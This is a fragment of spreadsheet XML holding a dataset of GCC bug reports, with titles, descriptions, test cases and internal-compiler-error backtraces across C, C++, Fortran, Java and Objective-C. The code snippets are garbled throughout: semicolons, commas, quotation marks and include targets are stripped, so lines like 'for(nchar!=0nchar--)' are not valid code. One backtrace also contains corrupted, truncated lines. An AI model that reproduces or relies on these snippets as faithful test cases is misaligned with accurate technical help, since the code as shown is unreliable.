(/usr/lib/lib-javax-swing.so.0.0.0)
Testcase attached. Note that the calculator functionality is stripped off
to make the testcase shorter. (This is slightly unfair for gcj because
the expression parser does work with gcj.)</t>
  </si>
  <si>
    <t>GCC-61268</t>
  </si>
  <si>
    <t>[4.10 regression] ICE in vt_expand_var_loc_chain at var-tracking.c:8262</t>
  </si>
  <si>
    <t>Between 20140516 (r210514) and 20140520 (r210655) a new testsuite failure occured both 32 and 64-bit:
FAIL: gcc.c-torture/compile/limits-fndefn.c  -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/compile/limits-fndefn.c  -O3 -g  (test for excess errors)
/vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.c-torture/compile/limits-fndefn.c:19:1: internal compiler error: in vt_expand_var_loc_chain at var-tracking.c:8262
0x9b06d7 vt_expand_var_loc_chain
        /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:8262
0x9b06d7 vt_expand_loc_callback
        /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:8458
0x371903 cselib_expand_value_rtx_1
        /vol/gcc/src/hg/trunk/local/gcc/cselib.c:1691
0x3716df cselib_expand_value_rtx_1
        /vol/gcc/src/hg/trunk/local/gcc/cselib.c:1729
0x373193 cselib_expand_value_rtx_cb(rtx_def* bitmap_head* int rtx_def* (*)(rtx_def* bitmap_head* int void*) void*)
        /vol/gcc/src/hg/trunk/local/gcc/cselib.c:1538
0x9        /vol/gcc/src/hg/trunk/local/gcc/cselib.c:1538
0x9afd4f vt_expand_var_loc_chain
        /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:8296
0x9afd4f vt_expand_loc_callback
        /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:8458
0x371903 cselib_expand_value_rtx_1
        /vol/gcc/src/hg/trunk/local/gcc/cselib.c:1691
0x3716df cselib_expand_value_rtx_1
        /vol/gcc/src/hg/trunk/local/gcc/cselib.c:1729
0x373193 cselib_expand_value_rtx_cb(rtx_def* bitmap_head* int rtx_def* (*)(rtx_def* bitmap_head* int void*) void*)
        /vol/gcc/src/hg/trunk/local/gcc/cselib.c:1538
0x9afd4f vt_expand_var_loc_chain
        /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:8296
0x9afd4f vt_expand_loc_callback
        /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:8458
0x371903 cselib_expand_value_rtx_1
        /vol/gcc/src/hg/trunk/local/gcc/cselib.c:1691
0x373193 cselib_expand_value_rtx_cb(rtx_def* bitmap_head* int rtx_def* (*)(rtx_def* bitmap_head* int void*) void*)
        /vol/gcc/src/hg/trunk/local/gcc/cselib.c:1538
0x9a43fb vt_expand_var_loc_chain
        /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:8296
afd4f vt_expand_var_loc_chain
0x9a43fb vt_expand_var_loc_chain
        /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:8296
0x9a43fb vt_expand_1pvar
        /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:8571
0x9a43fb emit_note_insn_var_location(variable_def** emit_note_data_def*)
        /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:8625
0x9b3613 traverse_noresize
        /vol/gcc/src/hg/trunk/local/gcc/hash-table.h:928
0x9b3613 traverse
        /vol/gcc/src/hg/trunk/local/gcc/hash-table.h:950
0x9b3613 emit_notes_for_changes
        /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:8985</t>
  </si>
  <si>
    <t>GCC-51345</t>
  </si>
  <si>
    <t>[avr] Devices with 8-bit SP need their own multilib(s)</t>
  </si>
  <si>
    <t>Code that reads SP register must not read from the high byte of SP if the SP is just 8 bits wide.
The C code will be correct once PR51002 will have been fixed however there is code in libgcc that also reads from __SP_H__ like __prologue_saves__ and __epilogue_restores__.
The issue is that the 8-bit property is set on the device level in avr_current_device-&gt;short_sp and devices with different settings of short_sp are mixed up the the same multilib.</t>
  </si>
  <si>
    <t>GCC-77305</t>
  </si>
  <si>
    <t>[7 Regression] -fdump-tree-all and -flto causes ICE</t>
  </si>
  <si>
    <t>apinski@apinski-ss1:~/rrt$ cat t.c
short calc_func() {}
apinski@apinski-ss1:~/rrt$ ./tools/bin/gcc -fdump-tree-all -flto t.c
In function â€˜calc_funcâ€™:
lto1: internal compiler error: Segmentation fault
0xa2d1b7 crash_signal
        ../../gcc/gcc/toplev.c:335
0xa146dc statistics_counter_event(function* char const* int)
        ../../gcc/gcc/statistics.c:315
0xac0ab7 update_ssa(unsigned int)
        ../../gcc/gcc/tree-into-ssa.c:3267
0x8ea4cb input_function
        ../../gcc/gcc/lto-streamer-in.c:1137
0x8ea4cb lto_read_body_or_constructor
        ../../gcc/gcc/lto-streamer-in.c:1208
0x64672b cgraph_node::get_untransformed_body()
        ../../gcc/gcc/cgraph.c:3568
0x65281b cgraph_node::expand()
        ../../gcc/gcc/cgraphunit.c:1955
0x653863 output_in_order
        ../../gcc/gcc/cgraphunit.c:2228
0x653c9f symbol_table::compile()
        ../../gcc/gcc/cgraphunit.c:2472
0x5bc047 lto_main()
        ../../gcc/gcc/lto/lto.c:3320
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
lto-wrapper: fatal error: ./tools/bin/gcc returned 1 exit status
compilation terminated.
/home/apinski/rrt/tools/bin/../lib/gcc/aarch64-unknown-linux-gnu/7.0.0/../../../../aarch64-unknown-linux-gnu/bin/ld: error: lto-wrapper failed
collect2: error: ld returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-59843</t>
  </si>
  <si>
    <t>ICE with return of generic vector on aarch64</t>
  </si>
  <si>
    <t>typedef double V __attribute__ ((vector_size (8)))
V
foo (void)
{
  V r = { 3.5 }
  return r
}
ICEs at all optimization levels on aarch64-linux trying to return BLKmode using a PARALLEL isn't going to work.  Seen both on the trunk and 4.8 branch.</t>
  </si>
  <si>
    <t>GCC-52905</t>
  </si>
  <si>
    <t>[C++0x] ice on invalid brace-enclosed initializer of vector of enums</t>
  </si>
  <si>
    <t>The invalid code below ICEs on gcc 4.6.1 and gcc 4.7.0.
It is caused by passing an int as an initializer to a vector of enums.
===
#include 
enum ev {abc}
std::vector v{a-1} // ICE
// std::vector v{ab} // passes
===
The messages are:
internal compiler error: in joust at cp/call.c:7642 (g++-4.6.1)
internal compiler error: in joust at cp/call.c:8009 (g++-4.7)</t>
  </si>
  <si>
    <t>dirkmoermans</t>
  </si>
  <si>
    <t>GCC-52181</t>
  </si>
  <si>
    <t>[4.7 Regression] merge_decls doesn't handle DECL_USER_ALIGN properly</t>
  </si>
  <si>
    <t>extern const int v1[]
const int __attribute__((aligned(16))) v1[] = { 0 }
extern const int __attribute__((aligned(16))) v2[]
const int v2[] = { 0 }
extern const int __attribute__((aligned(16))) v3[]
const int __attribute__((aligned(16))) v3[] = { 0 }
const int __attribute__((aligned(16))) v4[] = { 0 }
int test[(__alignof__ (v4) != __alignof__ (v1)/* { dg-bogus is negative } */
 || __alignof__ (v4) != __alignof__ (v2)
 || __alignof__ (v4) != __alignof__ (v3)) ? -1 : 0]
fails with gcc 4.7 worked with 4.6 but it looks like the actual bug is of an earlier date when DECL_USER_ALIGN bit has been moved from tree_decl_common etc.
down into tree_base.</t>
  </si>
  <si>
    <t>GCC-1682</t>
  </si>
  <si>
    <t>internal error during compilation of public final static String members</t>
  </si>
  <si>
    <t>A base class (Test1.java) contains:
 public final static String ID = |
A derived class accesses it as 'ID'.
Compilation:
GNU Java version 2.97 20001218 (experimental) (i686-pc-linux-gnu) compiled by GNU C version 2.97 20001218 (experimental).
Test2.java: In class `Test2':
Test2.java: In method `main(java.lang.String[])':
Test2.java:8: Internal error: Segmentation fault.
Release:
2.97 ss-gcc_ss_20001218
Environment:
Linux 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
How-To-Repeat:
The complete testcase has been attached.
The java files are Test1.java and Test2.java.
It's important to first create .class files. If not then
the error doesnot happen!</t>
  </si>
  <si>
    <t>GCC-45613</t>
  </si>
  <si>
    <t>bits/random.h misses include guards</t>
  </si>
  <si>
    <t>I just noticed that bits/random.h does not have include guards.</t>
  </si>
  <si>
    <t>GCC-25097</t>
  </si>
  <si>
    <t>Component of optional argument allowed as arg. to PRESENT</t>
  </si>
  <si>
    <t>using GNU Fortran 95 (GCC) 4.1.0 20051126 (prerelease)  with '-g -pedantic -std=f95' I get a bad / no diagnostic for the following invalid code:
 MODULE M1
  TYPE T1
   INTEGER :: I
  END TYPE T1
 CONTAINS
  SUBROUTINE S1(D1)
   TYPE(T1) OPTIONAL :: D1
   write(6*) PRESENT(D1%I)
  END SUBROUTINE S1
 END MODULE
 END</t>
  </si>
  <si>
    <t>GCC-68529</t>
  </si>
  <si>
    <t>scev failed for while(i--)</t>
  </si>
  <si>
    <t>loop distribution failed to generate memset library call for the following example:
#include 
#include 
int main(){
    char c[10000]={}
    unsigned int nchar=9999
    while(nchar--!=0)
      {   
       c[nchar]='A'
      }   
    printf(%s\nc)
    return 0
}
Compiled with 
gcc -O3 -march=core2  -fdump-tree-ldist-details  t.c -o t
From the ldist dump:
...
Creating dr for c[nchar_24]
analyze_innermost: failed: evolution of offset is not affine.
    base_address: 
    offset from base address: 
    constant offset from base address: 
    step: 
    aligned to: 
    base_object: c
    Access function 0: {9998 + 4294967295}_1
...
and it failed to transform the while loop to memset
=====
However it successed by change while(nchar--!=0) to  for(nchar !=0nchar--):
#include 
#include 
int main(){
    char c[10000]={}
    unsigned int nchar=9999
    for(nchar!=0nchar--)
      {   
       c[nchar]='A'
      }   
    printf(%s\nc)
    return 0
}
...
Creating dr for c[nchar_21]
analyze_innermost: success.
    base_address: &amp;c
    offset from base address: 0
    constant offset from base address: 9999
    step: -1
    aligned to: 128 
    base_object: c
    Access function 0: {9999 + 4294967295}_1
...
and generate memset library call stmt:
 __builtin_memset (
I also testd in gcc4.8.4 and trunk both failed.
--Jun</t>
  </si>
  <si>
    <t>majun4950646</t>
  </si>
  <si>
    <t>GCC-46159</t>
  </si>
  <si>
    <t>[4.5 Regression] Bogus warning about lambdas</t>
  </si>
  <si>
    <t>The following C++ code
void
f()
{
  int **p = new(int(*[2]))
}
gets what seems to be a bogus diagnostic from 4.5 and 4.6:
t.C: In function 'void f()':
t.C:4:21: warning: lambda expressions only available with -std=c++0x or -std=gnu++0x [enabled by default]
As far as I know this is valid C++98/C++03 code not involving a lambda.  4.4 accepts it with no diagnostic.</t>
  </si>
  <si>
    <t>GCC-27335</t>
  </si>
  <si>
    <t>[4.0/4.1 regression] ICE in get_loop_body</t>
  </si>
  <si>
    <t>extern void bar () __attribute__ ((noreturn))
inline double
baz (double *x unsigned int y)
{
  if (y &gt;= 6)
    bar ()
  return x[y]
}
double *a *b
void
foo ()
{
  unsigned int r s t
  for (r = 0 r &lt; 2 r++)
    for (t = 0 t &lt; 2 t++)
      {
        for (s = 0 s &lt; 3 s++)
          b[r * 2 + t] += baz (a 3 * s + t)
      }
}
ICEs with -O2 -funroll-loops in get_loop_body loop-&gt;num_nodes is 0.</t>
  </si>
  <si>
    <t>GCC-58534</t>
  </si>
  <si>
    <t>[c++1y] ICE with auto in template function parameters</t>
  </si>
  <si>
    <t>The following (valid I think) code snippet (compiled with -std=c++1y) triggers an ICE on trunk (4.9.0 20130922):
==================================================================
template void foo(const auto&amp;) {}
template void foo(const auto&amp; T...) {}
==================================================================
bug.cc:3:60: internal compiler error: same canonical type node for different types const __GenT0&amp; and const __GenT0&amp;
 template void foo(const auto&amp; T...) {}
                                                            ^
0x6617f1 comptypes
        ../../gcc/gcc/cp/typeck.c:1405
0x664dc3 compparms(tree_node const* tree_node const*)
        ../../gcc/gcc/cp/typeck.c:1504
0x56bd6d duplicate_decls(tree_node* tree_node* bool)
        ../../gcc/gcc/cp/decl.c:1515
0x6f8476 push_overloaded_decl_1
        ../../gcc/gcc/cp/name-lookup.c:2352
0x6f8476 push_overloaded_decl
        ../../gcc/gcc/cp/name-lookup.c:2447
0x6f9def pushdecl_maybe_friend_1
        ../../gcc/gcc/cp/name-lookup.c:898
0x6f9def pushdecl_maybe_friend(tree_node* bool)
        ../../gcc/gcc/cp/name-lookup.c:1264
0x6fbb37 pushdecl_with_scope_1
        ../../gcc/gcc/cp/name-lookup.c:2251
0x6fbbfd pushdecl_with_scope(tree_node* cp_binding_level* bool)
        ../../gcc/gcc/cp/name-lookup.c:2265
0x6fbcaf pushdecl_namespace_level(tree_node* bool)
        ../../gcc/gcc/cp/name-lookup.c:3826
0x5c2897 push_template_decl_real(tree_node* bool)
        ../../gcc/gcc/cp/pt.c:4867
0x55d210 start_preparsed_function(tree_node* tree_node* int)
        ../../gcc/gcc/cp/decl.c:13117
0x5771b6 start_function(cp_decl_specifier_seq* cp_declarator const* tree_node*)
        ../../gcc/gcc/cp/decl.c:13433
0x649ee7 cp_parser_function_definition_from_specifiers_and_declarator
        ../../gcc/gcc/cp/parser.c:22217
0x649ee7 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16348
0x64a974 cp_parser_single_declaration
        ../../gcc/gcc/cp/parser.c:22647
0x64d540 cp_parser_template_declaration_after_export
        ../../gcc/gcc/cp/parser.c:22449
0x6552e1 cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10728
0x653f0d cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10650
0x6557e6 cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:3939
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-48118</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5/4.6/4.7 regression] g++ sometimes allows copying a volatile class</t>
  </si>
  <si>
    <t>As noticed in PR 48113 we fail to give an error for the call to f below even though it involves copying a volatile object and A doesn't have a copy constructor that allows a volatile argument.
struct A { }
void f (A)
void (*g)(A)
int main()
{
  volatile A a
  f(a)
  g(a)
}</t>
  </si>
  <si>
    <t>GCC-31216</t>
  </si>
  <si>
    <t>TRANSFER in CASE leads to ICE</t>
  </si>
  <si>
    <t>A recent gfortran ICEs on the following code:
INTEGER :: I
CHARACTER(LEN=100) :: data=1.0 3.0
REAL :: CD
READ(data*) CD
I=TRANSFER(C/DI)
SELECT CASE(I)
CASE (TRANSFER(1.0/3.01))
CASE DEFAULT
 CALL ABORT()
END SELECT
END</t>
  </si>
  <si>
    <t>GCC-6430</t>
  </si>
  <si>
    <t>Obj-C dwarf2out crash with -ggdb3 and protocols</t>
  </si>
  <si>
    <t>Attached sidebar.m when compiled with 'gcc sidebar.m -c -ggdb3' gives the
following error:
sidebar.m:74: Internal compiler error in dwarf2out_finish at dwarf2out.c:11277
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.0.4
Environment:
System: Linux pillo 2.4.17 #23 Thu Jan 17 17:41:02 MST 2002 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ../gcc-3.0.4/configure --prefix=/usr --enable-shared --with-gnu-as --with-gnu-ld
How-To-Repeat:
sidebar.mi follows (as created by gcc -v -save-temps):
-------------------------------------------------------
# 1 sidebar.m
typedef struct objc_class *MetaClass
typedef struct objc_class *Class
struct objc_class {
  MetaClass class_pointer
  struct objc_class* super_class
  const char* name
  long version
  unsigned long info
  long instance_size
  struct objc_ivar_list* ivars
  struct objc_method_list* methods
  struct sarray * dtable
  struct objc_class* subclass_list
  struct objc_class* sibling_class
  struct objc_protocol_list *protocols
  void* gc_object_type
}
@class NSInvocation
@interface NSObject
@end
@interface NSView
@end
@interface Token : NSObject
@end
@protocol DocumentDelegate
- (void)molestedDocumentWithMessage: (NSInvocation *)msg
- (void)molestedGrammarWithMessage: (NSInvocation *)msg
- (void)destroyedDocument
- (void)destroyedGrammar
- (void)highlightedToken: (Token *)t
- (void)highlightedGrammar: (Class)c
@end
@interface Sidebar : NSView 
@end
@implementation Sidebar
- (void)molestedDocumentWithMessage: (NSInvocation *)m
{
}
- (void)molestedGrammarWithMessage: (NSInvocation *)m
{
}
- (void)destroyedDocument
{
}
- (void)destroyedGrammar
{
}
- (void)highlightedToken: (Token *)t
{
}
- (void)highlightedGrammar: (Class)c
{
}
@end
output of gcc -v -save-temps:
------------------------------
Reading specs from /usr/lib/gcc-lib/i586-pc-linux-gnu/3.0.4/specs
Configured with: ../gcc-3.0.4/configure --prefix=/usr --enable-shared --with-gnu-as --with-gnu-ld
Thread model: single
gcc version 3.0.4
 /usr/lib/gcc-lib/i586-pc-linux-gnu/3.0.4/cpp0 -lang-objc -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=4 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i586__ -D__tune_pentium__ sidebar.m sidebar.mi
GNU CPP version 3.0.4 (cpplib) (i386 Linux/ELF)
ignoring duplicate directory /home/mikpos/include
#include ... search starts here:
#include  search starts here:
 /home/mikpos/include
 /usr/lib/gcc-lib/i586-pc-linux-gnu/3.0.4/include/objc
 /usr/local/include
 /usr/lib/gcc-lib/i586-pc-linux-gnu/3.0.4/include
 /usr/i586-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i586-pc-linux-gnu/3.0.4/cc1obj -fpreprocessed sidebar.mi -quiet -dumpbase sidebar.m -ggdb3 -version -o sidebar.s
GNU CPP version 3.0.4 (cpplib) (i386 Linux/ELF)
GNU Objective-C version 3.0.4 (i586-pc-linux-gnu)
        compiled by GNU C version 3.0.4.
sidebar.m:74: Internal compiler error in dwarf2out_finish at dwarf2out.c:11277
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>mikpos</t>
  </si>
  <si>
    <t>GCC-41360</t>
  </si>
  <si>
    <t>[4.5 regression] Revision 151696 breaks gcc.c-torture/compile/builtin_unreachable-1.c</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 151702 gave:
FAIL: gcc.c-torture/compile/builtin_unreachable-1.c  -Os  (internal compiler error)
FAIL: gcc.c-torture/compile/builtin_unreachable-1.c  -Os  (test for excess errors)
Revision 151692 is OK.</t>
  </si>
  <si>
    <t>GCC-55112</t>
  </si>
  <si>
    <t>internal compiler error: in simplify_subreg at simplify-rtx.c:5424</t>
  </si>
  <si>
    <t>Using cross compile gcc (x86_64-&gt;powerpc-eabispe) the following command line results in an internal compiler error.
I've attached the problem object file.
Hope this is enough information thanks.
patrick@gtr:~/bug/report1$ powerpc-eabispe-gcc -v -Os -flto=jobserver -nostdlib -o test bug.o
Using built-in specs.
COLLECT_GCC=powerpc-eabispe-gcc
COLLECT_LTO_WRAPPER=/home/patrick/src/e7/toolchain/stage2/bin/../libexec/gcc/powerpc-eabispe/4.7.2/lto-wrapper
Target: powerpc-eabispe
Configured with: /z/src/e7/toolchain/src/gcc-4.7.2/configure --prefix=/z/src/e7/toolchain/stage2 --build=x86_64-unknown-linux-gnu --host=x86_64-unknown-linux-gnu --target=powerpc-eabispe --enable-languages=cc++ --with-sysroot=/z/src/e7/toolchain/../prex_sysroot --disable-nls --disable-werror --with-newlib --with-gmp=/z/src/e7/toolchain/stage2 --with-mpfr=/z/src/e7/toolchain/stage2 --disable-shared --disable-debug --disable-libssp --with-cpu=8540
Thread model: single
gcc version 4.7.2 (GCC) 
COMPILER_PATH=/home/patrick/src/e7/toolchain/stage2/bin/../libexec/gcc/powerpc-eabispe/4.7.2/:/home/patrick/src/e7/toolchain/stage2/bin/../libexec/gcc/:/home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/powerpc-eabispe/4.7.2/../../../../powerpc-eabispe/bin/
LIBRARY_PATH=/home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/powerpc-eabispe/4.7.2/:/home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/:/home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/powerpc-eabispe/4.7.2/../../../../powerpc-eabispe/lib/
COLLECT_GCC_OPTIONS='-v' '-Os' '-flto=jobserver' '-nostdlib' '-o' 'test' '-mcpu=8540'
 /home/patrick/src/e7/toolchain/stage2/bin/../libexec/gcc/powerpc-eabispe/4.7.2/collect2 -plugin /home/patrick/src/e7/toolchain/stage2/bin/../libexec/gcc/powerpc-eabispe/4.7.2/liblto_plugin.so -plugin-opt=/home/patrick/src/e7/toolchain/stage2/bin/../libexec/gcc/powerpc-eabispe/4.7.2/lto-wrapper -plugin-opt=-fresolution=/tmp/ccTv6kV7.res -flto=jobserver --sysroot=/z/src/e7/toolchain/../prex_sysroot --eh-frame-hdr -V -dn -Bstatic -o test -L/home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/powerpc-eabispe/4.7.2 -L/home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc -L/home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/powerpc-eabispe/4.7.2/../../../../powerpc-eabispe/lib bug.o
GNU ld (GNU Binutils) 2.22
  Supported emulations:
   elf32ppc
   elf32ppclinux
   elf32ppcsim powerpc-eabispe-gcc @/tmp/ccu1YKNX.args
Using built-in specs.
COLLECT_GCC=powerpc-eabispe-gcc
Target: powerpc-eabispe
Configured with: /z/src/e7/toolchain/src/gcc-4.7.2/configure --prefix=/z/src/e7/toolchain/stage2 --build=x86_64-unknown-linux-gnu --host=x86_64-unknown-linux-gnu --target=powerpc-eabispe --enable-languages=cc++ --with-sysroot=/z/src/e7/toolchain/../prex_sysroot --disable-nls --disable-werror --with-newlib --with-gmp=/z/src/e7/toolchain/stage2 --with-mpfr=/z/src/e7/toolchain/stage2 --disable-shared --disable-debug --disable-libssp --with-cpu=8540
Thread model: single
gcc version 4.7.2 (GCC) 
COLLECT_GCC_OPTIONS='-c' '-msdata=none' '-mno-spe' '-mcpu=8540' '-v' '-Os' '-nostdlib' '-mcpu=8540' '-dumpdir' './' '-dumpbase' 'test.wpa' '-fltrans-output-list=/tmp/cc4GjAt6.ltrans.out' '-fwpa' '-fresolution=/tmp/ccTv6kV7.res'
 /home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/../../libexec/gcc/powerpc-eabispe/4.7.2/lto1 -quiet -dumpdir ./ -dumpbase test.wpa -msdata=none -mno-spe -mcpu=8540 -mcpu=8540 -auxbase bug -Os -version -fltrans-output-list=/tmp/cc4GjAt6.ltrans.out -fwpa -fresolution=/tmp/ccTv6kV7.res @/tmp/ccfQPfB6
GNU GIMPLE (GCC) version 4.7.2 (powerpc-eabispe)
	compiled by GNU C version 4.7.2 GMP version 5.0.1 MPFR version 3.1.1 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU GIMPLE (GCC) version 4.7.2 (powerpc-eabispe)
	compiled by GNU C version 4.7.2 GMP version 5.0.1 MPFR version 3.1.1 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
COMPILER_PATH=/home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/../../libexec/gcc/powerpc-eabispe/4.7.2/:/home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/../../libexec/gcc/:/home/patrick/src/e7/toolchain/stage2/bin/../libexec/gcc/powerpc-eabispe/4.7.2/:/home/patrick/src/e7/toolchain/stage2/bin/../libexec/gcc/powerpc-eabispe/4.7.2/:/home/patrick/src/e7/toolchain/stage2/bin/../libexec/gcc/:/home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/powerpc-eabispe/4.7.2/../../../../powerpc-eabispe/bin/:/home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/powerpc-eabispe/4.7.2/../../../../powerpc-eabispe/bin/
LIBRARY_PATH=/home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/powerpc-eabispe/4.7.2/:/home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/:/home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/powerpc-eabispe/4.7.2/../../../../powerpc-eabispe/lib/
COLLECT_GCC_OPTIONS='-c' '-msdata=none' '-mno-spe' '-mcpu=8540' '-v' '-Os' '-nostdlib' '-mcpu=8540' '-dumpdir' './' '-dumpbase' 'test.wpa' '-fltrans-output-list=/tmp/cc4GjAt6.ltrans.out' '-fwpa' '-fresolution=/tmp/ccTv6kV7.res'
 make -f /tmp/ccIeKgxG.mk all
Using built-in specs.
COLLECT_GCC=powerpc-eabispe-gcc
Target: powerpc-eabispe
Configured with: /z/src/e7/toolchain/src/gcc-4.7.2/configure --prefix=/z/src/e7/toolchain/stage2 --build=x86_64-unknown-linux-gnu --host=x86_64-unknown-linux-gnu --target=powerpc-eabispe --enable-languages=cc++ --with-sysroot=/z/src/e7/toolchain/../prex_sysroot --disable-nls --disable-werror --with-newlib --with-gmp=/z/src/e7/toolchain/stage2 --with-mpfr=/z/src/e7/toolchain/stage2 --disable-shared --disable-debug --disable-libssp --with-cpu=8540
Thread model: single
gcc version 4.7.2 (GCC) 
COLLECT_GCC_OPTIONS='-c' '-msdata=none' '-mno-spe' '-mcpu=8540' '-v' '-Os' '-nostdlib' '-mcpu=8540' '-dumpdir' './' '-dumpbase' 'test.ltrans0' '-fltrans' '-o' '/tmp/cc4GjAt6.ltrans0.ltrans.o'
 /home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/../../libexec/gcc/powerpc-eabispe/4.7.2/lto1 -quiet -dumpdir ./ -dumpbase test.ltrans0 -msdata=none -mno-spe -mcpu=8540 -mcpu=8540 -auxbase-strip /tmp/cc4GjAt6.ltrans0.ltrans.o -Os -version -fltrans /tmp/cc4GjAt6.ltrans0.o -o /tmp/ccgARQQa.s
GNU GIMPLE (GCC) version 4.7.2 (powerpc-eabispe)
	compiled by GNU C version 4.7.2 GMP version 5.0.1 MPFR version 3.1.1 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU GIMPLE (GCC) version 4.7.2 (powerpc-eabispe)
	compiled by GNU C version 4.7.2 GMP version 5.0.1 MPFR version 3.1.1 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
In file included from /home/patrick/src/e7/prex/include/sys/list.h:225:0
                 from :80:
eqadc.c: In function 'eqadc_get_diag':
eqadc.c:955:20: internal compiler error: in simplify_subreg at simplify-rtx.c:5424
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [/tmp/cc4GjAt6.ltrans0.ltrans.o] Error 1
lto-wrapper: make returned 2 exit status
/home/patrick/src/e7/toolchain/stage2/bin/../lib/gcc/powerpc-eabispe/4.7.2/../../../../powerpc-eabispe/bin/ld: lto-wrapper failed
collect2: error: ld returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-44417</t>
  </si>
  <si>
    <t>make check-target-libstdc++-v3 fails due to undefined ptrdiff_t</t>
  </si>
  <si>
    <t>make check-target-libstdc++-v3 fails because ptrdiff_t is undefined.
std::ptrdiff_t works.
Maybe this bug is related to the Linux system run on.  I have openSuse 11.1 running.
configure --enable-languages=cc++ --program-suffix=-rep --prefix=$HOME/gcc/install_trunk_1
In file included from /home/singler/gcc/trunk_1/libstdc++-v3/testsuite/util/testsuite_abi.h:27:0
                 from /home/singler/gcc/trunk_1/libstdc++-v3/testsuite/util/testsuite_abi.cc:23:
/home/singler/gcc/trunk_1/libstdc++-v3/libsupc++/cxxabi.h:371:5: error: 'ptrdiff_t' does not name a type
/home/singler/gcc/trunk_1/libstdc++-v3/libsupc++/cxxabi.h:447:23: error: 'ptrdiff_t' has not been declared
/home/singler/gcc/trunk_1/libstdc++-v3/libsupc++/cxxabi.h:459:18: error: 'ptrdiff_t' has not been declared
/home/singler/gcc/trunk_1/libstdc++-v3/libsupc++/cxxabi.h:469:26: error: 'ptrdiff_t' has not been declared
/home/singler/gcc/trunk_1/libstdc++-v3/libsupc++/cxxabi.h:495:18: error: 'ptrdiff_t' has not been declared
/home/singler/gcc/trunk_1/libstdc++-v3/libsupc++/cxxabi.h:501:26: error: 'ptrdiff_t' has not been declared
/home/singler/gcc/trunk_1/libstdc++-v3/libsupc++/cxxabi.h:540:18: error: 'ptrdiff_t' has not been declared
/home/singler/gcc/trunk_1/libstdc++-v3/libsupc++/cxxabi.h:546:26: error: 'ptrdiff_t' has not been declared
/home/singler/gcc/trunk_1/libstdc++-v3/libsupc++/cxxabi.h:566:4: error: 'ptrdiff_t' has not been declared
compiler exited with status 1
Any ideas and/or a workaround?</t>
  </si>
  <si>
    <t>GCC-20850</t>
  </si>
  <si>
    <t>ICE with invalid character equivalence</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
CHARACTER(LEN=10) :: B
CHARACTER :: A
EQUIVALENCE (AB(1:-1))
END</t>
  </si>
  <si>
    <t>GCC-82960</t>
  </si>
  <si>
    <t>spu_machine_dependent_reorg does not handle jump_table_data insn</t>
  </si>
  <si>
    <t>When building spu with --enable-checking=yesrtl I run into:
...
0xf965db rtl_check_failed_type2(rtx_def const* int int int char const* int char const*)
        src/gcc/rtl.c:820
0x14b6cca pad_bb
        src/gcc/config/spu/spu.c:2032
0x14b9d8b spu_machine_dependent_reorg
        src/gcc/config/spu/spu.c:2640
0xf83d92 execute
        src/gcc/reorg.c:3947
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
...
In pad_bb we loop over the insns using active_insn_p and next_active_insn but do not handle the jump_table_data insn.</t>
  </si>
  <si>
    <t>GCC-4338</t>
  </si>
  <si>
    <t>ice on ugly template code</t>
  </si>
  <si>
